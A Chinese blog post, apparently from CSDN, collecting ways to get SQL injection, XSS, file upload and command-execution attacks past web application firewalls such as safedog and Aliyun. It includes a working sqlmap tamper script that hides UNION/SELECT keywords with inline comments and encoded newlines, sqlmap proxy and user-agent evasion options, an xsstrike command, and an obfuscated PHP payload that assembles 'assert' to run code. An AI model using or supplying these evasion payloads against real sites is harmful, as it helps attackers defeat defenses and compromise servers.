WAF绕过-注入上传RCE利用绕过思路

0x00 简介

当我对对象检测,已经检测到存在sql注入,文件上传或者RCE等漏洞的时候,发现验证漏洞的存在,被waf拦截,无法验证漏洞,这里总结sqlmap的注入绕过,xss工具使用的绕过,文件上传的思路,以及RCE命令执行的命令写法绕过safedog,BT,aliyun

0x01 绕过思路

1)sqlmap绕过思路
cc绕过:

cc绕过:使用代理扫描:--proxy="http://代理IP:端口" 

payload变异绕过思路:
指的是当我们以及确定存在注入,我们尝试去手工注入验证查看回显时候,输入的sql注入语句被拦截,我们需要在sqlmap里面编写payload脚本,达到替换绕过

下面是payload变异的演示:
调用内联注释方法 #,/**/,/*!*/三者的区别,/*!*/可实现注释内函数生效
与注释换行绕过:%23a%0a
 根据可绕过编写python插件,再结合sqlmap工具调用插件实现绕过

#!/usr/bin/env python

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH

def tamper(payload, **kwargs):
  
    retVal = ""

	if payload:
		payload = payload.replace("union","%23a%0aunion")

		payload = payload.replace("select","/*!select*/")
	
		payload = payload.replace("%20","%23a%0a")

		payload = payload.replace(" ","%23a%0a")
		payload = payload.replace("database()","database%23a%0a()")
	
	return payload
		

修改数据头UA绕过思路

自定义头:--user-agent=“头”
自带随机头:--random-agent

2)文件上传绕过思路,这里参照以往的文件上传的各种上传思路做参照实现绕过
举例截断绕过:

3)xss工具绕过思路
使用xsstrike

xsstrike.py -u “?请求地址” 代理请求–proxy=“” 延迟参数:–timeout

4)RCE绕过思路
函数替换思路:

aaa=$x='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','',' pxhpxinxfo()');$xxx($y);

加解密函数调用思路:

请求方式更改绕过思路:

遇到实际情况可以根据抓取数据包分析,采用人工+工具分析

以上提供思路,无法绕过说明任然有waf规则拦截,需要再寻找方法

交流学习:
博客:http://www.kxsy.work
CSND社区:告白热

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值